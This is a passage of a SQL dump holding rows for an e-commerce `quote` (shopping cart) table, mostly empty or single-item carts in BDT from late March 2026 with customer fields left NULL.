(710, 1, '2026-03-28 15:40:22', '2026-03-28 15:41:14', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(711, 1, '2026-03-28 15:40:23', '2026-03-28 15:40:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(712, 1, '2026-03-28 15:40:24', '2026-03-28 15:40:24', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(713, 1, '2026-03-28 15:40:26', '2026-03-28 15:40:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(714, 1, '2026-03-28 15:40:27', '2026-03-28 15:40:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(715, 1, '2026-03-28 15:40:28', '2026-03-28 15:40:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(716, 1, '2026-03-28 15:40:30', '2026-03-28 15:40:30', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(717, 1, '2026-03-28 15:40:31', '2026-03-28 15:40:31', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(718, 1, '2026-03-28 15:40:32', '2026-03-28 15:40:32', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(719, 1, '2026-03-28 15:40:33', '2026-03-28 15:40:33', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(720, 1, '2026-03-28 15:40:35', '2026-03-28 15:40:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(721, 1, '2026-03-28 15:40:36', '2026-03-28 15:40:36', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(722, 1, '2026-03-28 15:40:37', '2026-03-28 15:40:37', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(723, 1, '2026-03-28 15:40:42', '2026-03-28 15:40:42', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(724, 1, '2026-03-28 15:40:45', '2026-03-28 15:40:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(725, 1, '2026-03-28 15:40:50', '2026-03-28 15:40:50', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(726, 1, '2026-03-28 15:40:59', '2026-03-28 15:40:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(727, 1, '2026-03-28 15:41:03', '2026-03-28 15:41:03', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(728, 1, '2026-03-28 15:41:06', '2026-03-28 15:41:06', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(729, 1, '2026-03-28 15:41:09', '2026-03-28 15:41:09', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(730, 1, '2026-03-28 15:41:11', '2026-03-28 15:41:13', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(731, 1, '2026-03-28 15:41:16', '2026-03-28 15:41:17', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(732, 1, '2026-03-28 15:41:18', '2026-03-28 15:41:19', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(733, 1, '2026-03-28 15:41:21', '2026-03-28 15:41:22', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(734, 1, '2026-03-28 15:41:24', '2026-03-28 15:41:25', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(735, 1, '2026-03-28 15:41:26', '2026-03-28 15:41:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(736, 1, '2026-03-28 16:48:45', '2026-03-28 16:48:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(737, 1, '2026-03-28 17:45:30', '2026-03-28 17:45:32', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(738, 1, '2026-03-28 23:50:04', '2026-03-28 23:50:11', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(739, 1, '2026-03-29 00:26:22', '2026-03-29 00:26:22', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(740, 1, '2026-03-29 05:22:02', '2026-03-29 05:22:04', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(741, 1, '2026-03-29 08:07:16', '2026-03-29 08:07:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(742, 1, '2026-03-29 11:17:08', '2026-03-29 11:17:11', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(743, 1, '2026-03-29 11:41:36', '2026-03-29 11:42:02', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(744, 1, '2026-03-29 11:41:42', '2026-03-29 11:41:42', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(745, 1, '2026-03-29 11:41:43', '2026-03-29 11:41:43', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(746, 1, '2026-03-29 11:41:45', '2026-03-29 11:41:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(747, 1, '2026-03-29 11:41:46', '2026-03-29 11:41:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(748, 1, '2026-03-29 11:41:48', '2026-03-29 11:41:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(749, 1, '2026-03-29 11:41:49', '2026-03-29 11:41:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(750, 1, '2026-03-29 11:41:51', '2026-03-29 11:41:51', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(751, 1, '2026-03-29 11:41:52', '2026-03-29 11:41:52', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0);
INSERT INTO `quote` (`entity_id`, `store_id`, `created_at`, `updated_at`, `converted_at`, `is_active`, `is_virtual`, `is_multi_shipping`, `items_count`, `items_qty`, `orig_order_id`, `store_to_base_rate`, `store_to_quote_rate`, `base_currency_code`, `store_currency_code`, `quote_currency_code`, `grand_total`, `base_grand_total`, `checkout_method`, `customer_id`, `customer_tax_class_id`, `customer_group_id`, `customer_email`, `customer_prefix`, `customer_firstname`, `customer_middlename`, `customer_lastname`, `customer_suffix`, `customer_dob`, `customer_note`, `customer_note_notify`, `customer_is_guest`, `remote_ip`, `applied_rule_ids`, `reserved_order_id`, `password_hash`, `coupon_code`, `global_currency_code`, `base_to_global_rate`, `base_to_quote_rate`, `customer_taxvat`, `customer_gender`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `is_changed`, `trigger_recollect`, `ext_shipping_info`, `gift_message_id`, `is_persistent`) VALUES
(752, 1, '2026-03-29 11:41:54', '2026-03-29 11:41:54', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(753, 1, '2026-03-29 11:41:55', '2026-03-29 11:41:55', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(754, 1, '2026-03-29 11:41:56', '2026-03-29 11:41:56', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(755, 1, '2026-03-29 11:41:58', '2026-03-29 11:41:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(756, 1, '2026-03-29 11:42:06', '2026-03-29 11:42:07', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(757, 1, '2026-03-29 11:42:12', '2026-03-29 11:42:13', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(758, 1, '2026-03-29 11:42:17', '2026-03-29 11:42:17', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(759, 1, '2026-03-29 11:42:22', '2026-03-29 11:42:23', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(760, 1, '2026-03-29 11:42:27', '2026-03-29 11:42:28', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(761, 1, '2026-03-29 15:42:21', '2026-03-29 15:42:21', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(762, 1, '2026-03-29 18:29:31', '2026-03-29 18:29:34', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(763, 1, '2026-03-29 20:35:08', '2026-03-29 20:35:32', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(764, 1, '2026-03-29 20:35:14', '2026-03-29 20:35:14', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(765, 1, '2026-03-29 20:35:15', '2026-03-29 20:35:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(766, 1, '2026-03-29 20:35:16', '2026-03-29 20:35:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(767, 1, '2026-03-29 20:35:18', '2026-03-29 20:35:18', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(768, 1, '2026-03-29 20:35:19', '2026-03-29 20:35:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(769, 1, '2026-03-29 20:35:20', '2026-03-29 20:35:20', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
